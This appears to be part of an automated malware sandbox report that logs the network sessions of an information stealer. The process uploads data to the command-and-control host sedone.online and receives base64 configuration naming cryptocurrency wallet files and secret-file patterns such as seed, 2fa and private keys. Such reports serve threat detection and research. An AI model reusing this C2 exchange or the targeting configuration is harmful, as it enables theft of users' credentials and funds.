                                                                                                                                                                                                                                                                                          2024-12-15 19:48:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:16 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          22192.168.2.449803116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:10 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----26XB16PZUA1VAASJ5PHV
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:10 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 32 36 58 42 31 36 50 5a 55 41 31 56 41 41 53 4a 35 50 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 32 36 58 42 31 36 50 5a 55 41 31 56 41 41 53 4a 35 50 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 32 36 58 42 31 36 50 5a 55 41 31 56 41 41 53 4a 35 50 48 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------26XB16PZUA1VAASJ5PHVContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------26XB16PZUA1VAASJ5PHVContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------26XB16PZUA1VAASJ5PHVCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:11 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:11 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                                          Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          23192.168.2.449809116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:13 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----YM7YMOHLXBIEUAIMOP89
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:13 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 59 4d 37 59 4d 4f 48 4c 58 42 49 45 55 41 49 4d 4f 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 59 4d 37 59 4d 4f 48 4c 58 42 49 45 55 41 49 4d 4f 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 59 4d 37 59 4d 4f 48 4c 58 42 49 45 55 41 49 4d 4f 50 38 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------YM7YMOHLXBIEUAIMOP89Content-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------YM7YMOHLXBIEUAIMOP89Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------YM7YMOHLXBIEUAIMOP89Cont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:14 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:13 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:14 UTC2208INData Raw: 38 39 34 0d 0a 52 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                                                          Data Ascii: 894RGVza3RvcHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          24192.168.2.449835116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:25 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----6FUKNYC2NGV3E3OH4ECJ
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 32481
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:25 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 36 46 55 4b 4e 59 43 32 4e 47 56 33 45 33 4f 48 34 45 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 36 46 55 4b 4e 59 43 32 4e 47 56 33 45 33 4f 48 34 45 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 36 46 55 4b 4e 59 43 32 4e 47 56 33 45 33 4f 48 34 45 43 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------6FUKNYC2NGV3E3OH4ECJContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------6FUKNYC2NGV3E3OH4ECJContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------6FUKNYC2NGV3E3OH4ECJCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:25 UTC16126OUTData Raw: 46 73 61 58 70 6c 51 32 46 73 62 47 4a 68 59 32 74 42 63 6e 4a 68 65 51 41 41 56 51 42 58 5a 48 4e 54 5a 58 52 31 63 45 78 76 5a 30 31 6c 63 33 4e 68 5a 32 56 58 41 46 59 41 56 32 52 7a 55 33 56 69 63 32 4e 79 61 57 4a 6c 52 58 67 41 41 41 4d 41 51 32 39 75 63 33 52 79 64 57 4e 30 55 47 46 79 64 47 6c 68 62 45 31 7a 5a 31 5a 58 41 41 51 41 51 33 56 79 63 6d 56 75 64 45 6c 51 41 46 64 45 55 30 4e 50 55 6b 55 75 5a 47 78 73 41 47 34 45 55 6e 52 73 53 57 35 70 64 46 56 75 61 57 4e 76 5a 47 56 54 64 48 4a 70 62 6d 63 41 41 4a 38 42 54 6e 52 50 63 47 56 75 52 6d 6c 73 5a 51 41 41 62 6e 52 6b 62 47 77 75 5a 47 78 73 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: FsaXplQ2FsbGJhY2tBcnJheQAAVQBXZHNTZXR1cExvZ01lc3NhZ2VXAFYAV2RzU3Vic2NyaWJlRXgAAAMAQ29uc3RydWN0UGFydGlhbE1zZ1ZXAAQAQ3VycmVudElQAFdEU0NPUkUuZGxsAG4EUnRsSW5pdFVuaWNvZGVTdHJpbmcAAJ8BTnRPcGVuRmlsZQAAbnRkbGwuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:26 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:26 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:26 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          25192.168.2.449841116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:26 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----0ZC2DBS0R1NYU3WT0HLN
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 4421
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
